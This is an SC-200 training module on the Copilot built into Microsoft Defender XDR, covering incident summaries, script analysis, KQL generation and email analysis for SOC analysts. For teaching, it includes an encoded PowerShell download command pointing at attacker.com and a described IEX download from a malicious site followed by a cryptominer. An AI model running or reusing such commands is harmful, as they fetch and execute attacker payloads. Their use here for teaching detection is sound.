5.4 Embedded Copilot in Defender XDR

12-16 hours · Module 5

Embedded Copilot in Defender XDR

SC-200 Exam Objective

Domain 3 — Manage Incident Response: "Investigate incidents by using agentic AI, including embedded Copilot for Security." The Defender XDR embedded experience is the most frequently tested Copilot capability on the SC-200 exam.

Introduction

The embedded Copilot experience in Defender XDR is where most SOC analysts encounter Copilot for the first time. Unlike the standalone portal (which requires navigating to a separate site), the embedded experience appears directly within the Defender portal — integrated into the incident page, the alert detail view, and the Advanced Hunting interface.

The embedded experience provides five key capabilities: incident summary (instant narrative of the incident), alert explanation (what each alert means), guided response (recommended next actions), script analysis (inline analysis of suspicious scripts), and KQL generation (natural language to KQL in Advanced Hunting).


Incident summary

When you open an incident in the Defender XDR portal, Copilot generates an automatic incident summary in the Copilot panel on the right side of the screen. The summary includes: what happened (narrative description of the attack), which entities are involved (users, devices, IPs, email addresses), the timeline (chronological sequence of alerts), and the current status (severity, assignment, investigation stage).

MANUAL TRIAGE vs COPILOT-ASSISTED TRIAGEManual: 10-15 minutesOpen each alert → read details → understand sequence → form narrativeCopilot: 30 secondsOpen incident → read summary → validate against alert data
Figure 5.3: The incident summary replaces the initial triage phase. Instead of reading each alert individually to form a mental model of the incident, the analyst reads Copilot's summary and validates it against the alert data. The investigation starts from an informed position rather than a blank slate.

How the incident summary works: Copilot reads all alerts in the incident, extracts the key entities and relationships, orders the events chronologically, and generates a natural language narrative. The summary includes MITRE ATT&CK tactic references and identifies the likely attack type (BEC, AiTM, ransomware pre-encryption, insider threat).

Validation workflow: Read the summary, then spot-check 2-3 claims against the actual alert data. Does the summary say the user signed in from Russia? Check the sign-in log. Does it say 5 emails were sent externally? Check the email events. If the spot checks pass, the summary is reliable. If any spot check fails, investigate the discrepancy before relying on the summary.

The summary is regenerated each time you open the incident — it reflects the current state of the incident, including any new alerts that were correlated after your last visit.


Alert explanation

Each alert in the incident has a “Copilot explain” button that generates a contextual explanation: what the alert means, what activity triggered it, why it is considered suspicious, and what the alert indicates about the attack stage.

This is particularly valuable for uncommon alert types that analysts encounter infrequently. An analyst who sees “Suspicious inbox forwarding rule created” daily does not need an explanation. An analyst who encounters “Anomalous token activity following suspicious sign-in” for the first time benefits significantly from Copilot’s explanation of what token replay means, how AiTM attacks work, and why this alert pattern indicates session token theft.

Investigation use: Use alert explanation to build understanding of unfamiliar alerts before investigating them. The explanation provides the context needed to determine the correct investigation path — which data sources to check, which entities to focus on, and what the expected evidence looks like.


Guided response

After summarising the incident and explaining the alerts, Copilot offers guided response recommendations — specific actions to take based on the incident findings. Recommendations vary by incident type.

For a compromised identity incident: “Reset the user’s password,” “Revoke all active sessions,” “Check for inbox forwarding rules,” “Review sign-in activity for the last 7 days.”

For a malware incident: “Isolate the affected device,” “Collect the investigation package,” “Check for lateral movement indicators,” “Run a full antivirus scan.”

For a data exfiltration incident: “Confirm the data was blocked or delivered (check DLP action),” “Assess the data sensitivity,” “Begin data breach notification assessment.”

Critical principle: Guided response recommendations are suggestions, not automated actions. Copilot does not execute response actions — it recommends them. The analyst evaluates each recommendation against the operational context (is this a production server? Is the user in a critical meeting? Does the recommendation align with our incident response procedures?) and decides which to execute.

Some recommendations include a “Take action” link that pre-populates the response action in the Defender portal (e.g., clicking “Isolate device” opens the device isolation panel). This reduces the number of clicks from recommendation to action.


Script analysis

When an alert includes a suspicious script (PowerShell command line, encoded script block, Python script, or bash command), Copilot provides inline script analysis. The analysis includes: a plain-language explanation of what the script does, identification of obfuscation techniques, extraction of IOCs (domains, IPs, file paths, registry keys), and an assessment of the script’s purpose (reconnaissance, credential theft, data exfiltration, persistence establishment).

Example: An alert contains the following PowerShell command:

powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAA=

Manual analysis requires: recognise Base64 encoding, decode the string, read the decoded command, identify the URL, assess the purpose. This takes 5-10 minutes for a simple script, longer for heavily obfuscated multi-stage scripts.

Copilot analysis: “This PowerShell command decodes to Invoke-WebRequest https://attacker.com/payload, which downloads a file from an external URL. The use of Base64 encoding (-enc parameter) is an obfuscation technique commonly used to evade command-line logging detection. IOC: attacker.com (likely C2 domain). Assessment: initial payload download — likely Stage 1 of a multi-stage attack.”

This analysis takes Copilot 10 seconds. For obfuscated scripts that use multiple layers of encoding, variable substitution, and string concatenation, the time savings are even more dramatic — what takes an analyst 30-45 minutes of manual deobfuscation takes Copilot seconds.


KQL generation in Advanced Hunting

The Advanced Hunting page in Defender XDR includes a Copilot bar that accepts natural language queries and generates KQL. Instead of writing KQL from scratch, describe what you want in natural language and Copilot generates the query.

Natural language to KQL examples:

Prompt: “Show me all successful sign-ins from IP 203.0.113.47 in the last 7 days” Copilot generates:

1
2
3
4
5
6
7
SigninLogs
| where TimeGenerated > ago(7d)
| where IPAddress == "203.0.113.47"
| where ResultType == "0"
| project TimeGenerated, UserPrincipalName, IPAddress,
    AppDisplayName, LocationDetails
| order by TimeGenerated desc

Prompt: “Find all emails with attachments sent by j.morrison to external recipients between March 18 and March 19” Copilot generates:

1
2
3
4
5
6
7
EmailEvents
| where Timestamp between (datetime(2026-03-18) .. datetime(2026-03-19))
| where SenderFromAddress =~ "j.morrison@northgateeng.com"
| where RecipientEmailAddress !has "northgateeng.com"
| where AttachmentCount > 0
| project Timestamp, RecipientEmailAddress, Subject, AttachmentCount
| order by Timestamp asc

Iteration pattern: Run the generated query. If the results are not what you expected, describe the issue to Copilot: “The query returned too many results. Add a filter for emails where the delivery action is ‘Delivered’ only.” Copilot modifies the query accordingly. This iterative refinement is faster than editing the KQL manually for analysts who are still building KQL proficiency, and equally fast for experienced analysts who use it as a productivity shortcut.

Validation requirement: Always review the generated KQL before running it. Common Copilot KQL errors include: wrong table names (using a table that does not exist in the Defender XDR schema), incorrect field names (hallucinating a field that sounds right but does not exist), wrong filter operators (using == where has is needed for partial string matching), and incorrect time formats (wrong datetime syntax). These errors are typically obvious to an analyst who knows KQL (from Module 6) and can be corrected in seconds.


Identity and device summaries

The embedded Copilot experience also provides summaries for individual entities — users and devices — that appear in incident context.

Identity summary: When you click on a user entity in an incident, Copilot generates an identity assessment: the user’s role, recent sign-in patterns, risk level, devices used, recent alerts involving this identity, and any anomalous behavior detected. This is the quick-reference that tells you “is this a normal user doing normal things, or is this identity behaving unusually?”

Device summary: When you click on a device entity, Copilot generates a device assessment: the device’s health status, installed security agents, recent alerts, vulnerability exposure, and any suspicious activity. This is the quick-reference that tells you “is this device compromised or healthy?”

Both summaries are generated in seconds and replace the manual process of navigating to the user/device page, reviewing the activity timeline, and forming an assessment — a process that typically takes 5-10 minutes per entity.


Alert correlation explanation

Defender XDR’s correlation engine groups related alerts into incidents, but the logic behind the correlation is not always obvious to the analyst. When an incident contains alerts from 4 different products, understanding why they are correlated is essential for determining whether the correlation is correct (all alerts are truly part of the same attack) or incorrect (unrelated alerts were grouped by coincidence — a shared entity that was involved in multiple unrelated events).

Copilot capability: “Explain why these alerts are correlated into the same incident.”

Copilot analyses the shared entities between alerts and explains: “These 7 alerts are correlated because they share the entity j.morrison@northgateeng.com. Alert 1 (phishing email delivery) and Alert 2 (URL click) share the recipient email. Alert 3 (anomalous sign-in) shares the user identity. Alert 4 (inbox rule creation) shares the user identity and overlaps temporally with Alert 3. Alert 5 (file download) shares the user identity and the attacker IP from Alert 3. Alert 6 (DLP match) shares the user identity and the time window. Alert 7 (Defender for Cloud Apps anomaly) shares the user identity.”

This explanation validates the correlation: all alerts share the same compromised identity and occur within a consistent time window. The correlation is legitimate — this is one multi-stage attack, not 7 separate incidents.

When correlation is wrong: If Copilot’s explanation reveals that alerts share only a generic entity (a common IP address like the corporate VPN exit point, or a broadly used service account), the correlation may be incorrect. Two unrelated alerts sharing a VPN IP does not mean they are the same attack. In this case, the analyst should split the incident — removing the unrelated alert into its own incident for separate investigation.


Device timeline summary with Copilot

When investigating a compromised endpoint as part of a larger incident, the device timeline in MDE can contain thousands of events. Scrolling through the timeline manually to identify the attack sequence takes 15-30 minutes. Copilot summarises the timeline in seconds.

Prompt (in the Defender portal, with the device selected): “Summarise the activity on PROD-WEB-01 between 03:00 and 04:00 UTC, focusing on suspicious processes, network connections, and file modifications.”

Copilot analyses the DeviceProcessEvents, DeviceNetworkEvents, and DeviceFileEvents tables for the specified device and time window, and generates a narrative: “At 03:10, an RDP session was established from IP 203.0.113.47. At 03:12, PowerShell.exe was launched by the RDP session user and executed an IEX (Invoke-Expression) command downloading content from http://malicious.site/payload. At 03:14, the downloaded payload launched xmrig.exe from C:\Temp. At 03:15, xmrig.exe established connections to mining pool stratum+tcp://pool.example.com:3333. No additional process creation or file modification was detected between 03:15 and 04:00.”

This summary gives the analyst the complete attack narrative for this device in 10 seconds. The analyst validates by spot-checking 2-3 events against the raw timeline, then proceeds to containment.


Investigation acceleration: where Copilot makes the biggest difference in Defender XDR

Based on real-world usage patterns, the embedded Copilot in Defender XDR provides the most dramatic time savings in three specific scenarios:

Multi-alert incidents (5+ correlated alerts). The more alerts in an incident, the more time manual triage takes. Copilot’s incident summary scales to any number of alerts — a 15-alert incident is summarised as quickly as a 3-alert incident. The time saving grows proportionally with incident complexity.

Unfamiliar alert types. When an analyst encounters an alert type they have not seen before, understanding what it means and how to investigate it requires documentation research (5-10 minutes). Copilot’s alert explanation provides this understanding in seconds, with the explanation grounded in the specific alert instance rather than generic documentation.

Script-heavy incidents. Alerts involving obfuscated scripts, encoded commands, or multi-stage execution chains require significant manual analysis. Copilot’s script analysis is one of its most reliable capabilities — it handles Base64 decoding, variable deobfuscation, and execution flow analysis with high accuracy. For incidents involving 3-5 suspicious scripts, Copilot saves 30-60 minutes of manual deobfuscation.


Copilot in the investigation graph

The Defender XDR investigation graph visually maps the relationships between entities in an incident — users, devices, IPs, emails, and files connected by lines showing how they relate. For complex incidents with 20+ entities, the graph can be overwhelming.

Copilot assists by explaining the graph: “Describe the key relationships in this incident’s investigation graph.” Copilot identifies the central entities (the compromised user, the attacker IP), the critical relationships (the user signed in from the attacker IP, then accessed the device, then accessed the mailbox), and the peripheral entities (other users who received emails from the compromised account — potential secondary victims).

This explanation converts a visual diagram into a narrative that identifies the investigation priorities: “The central entity is j.morrison — all other entities connect through this identity. The primary investigation path is: attacker IP → j.morrison sign-in → PROD-WEB-01 → SharePoint Finance site. The secondary path is: j.morrison mailbox → 3 internal recipients (potential lateral phishing). Investigate the primary path first, then assess the secondary path.”


Email analysis in Defender for Office 365 with Copilot

When investigating phishing incidents, the embedded Copilot in the Defender portal provides email-specific analysis:

Email header analysis. Copilot analyses email authentication results (SPF, DKIM, DMARC), the sender’s reputation, the message routing path, and any anomalies that indicate spoofing or impersonation. “Analyse the headers of the phishing email in this incident” produces a structured assessment: “SPF: Pass (the sender domain’s SPF record includes the sending IP — this is not spoofed). DKIM: Fail (no valid DKIM signature). DMARC: Fail (alignment failure). Assessment: the email passed SPF because the attacker controls the sending infrastructure, but failed DKIM and DMARC. This is a domain impersonation attack using a lookalike domain, not a spoofed email from the legitimate domain.”

URL analysis. Copilot analyses URLs in phishing emails: “The URL in the phishing email redirects through 3 domains: click-tracker.com → redirect-service.net → credential-harvest.com/login. The final destination (credential-harvest.com) was registered 48 hours before the email was sent and uses a domain name similar to the legitimate login portal. Assessment: this is a credential harvesting page using a recently registered lookalike domain.”

Try it yourself

If Copilot is enabled in your Defender XDR portal, open any incident and look for the Copilot panel on the right side of the incident page. Read the incident summary. Click "Explain" on an individual alert. Check the guided response recommendations. Then navigate to Advanced Hunting, click the Copilot bar, and type a natural language query like "Show me all sign-in failures in the last 24 hours." Evaluate the generated KQL — is the table name correct? Are the field names correct? Run the query and check the results.

What you should observe

The incident summary should provide a coherent narrative of the incident. The alert explanation should describe the alert type, the trigger condition, and the security significance. The guided response should list 3-5 specific actions relevant to the incident type. The KQL generation should produce a runnable query — though you may need one iteration to correct field names or filter conditions.


Knowledge check

Check your understanding

1. Copilot's guided response recommends "Isolate the affected device." How should you handle this recommendation?

Evaluate the recommendation against operational context before executing. Is this a production server? Is isolation appropriate at this stage of the investigation? Will isolation disrupt critical business operations? If the recommendation is appropriate, execute it. If not (e.g., the "device" is a production database server that cannot be isolated without business impact), adapt the response — perhaps restrict network access instead of full isolation. Copilot recommends based on security best practices. You decide based on operational reality.
Execute immediately — Copilot recommendations are always correct
Ignore it — Copilot does not understand your environment
Ask Copilot for permission before executing

2. Copilot generates a KQL query in Advanced Hunting. You run it and get zero results, but you know the activity occurred. What is the most likely issue?

The query contains an incorrect filter value. Common Copilot KQL errors: country name vs country code ("Russia" vs "RU"), case sensitivity in field values, incorrect datetime format, or a field name that does not exist in the schema. Check each filter condition against the actual data schema. Run a broad version of the query (remove filters one by one) to identify which filter is excluding the expected results.
The data does not exist — the activity did not occur
Copilot queries cannot access your data
Advanced Hunting is down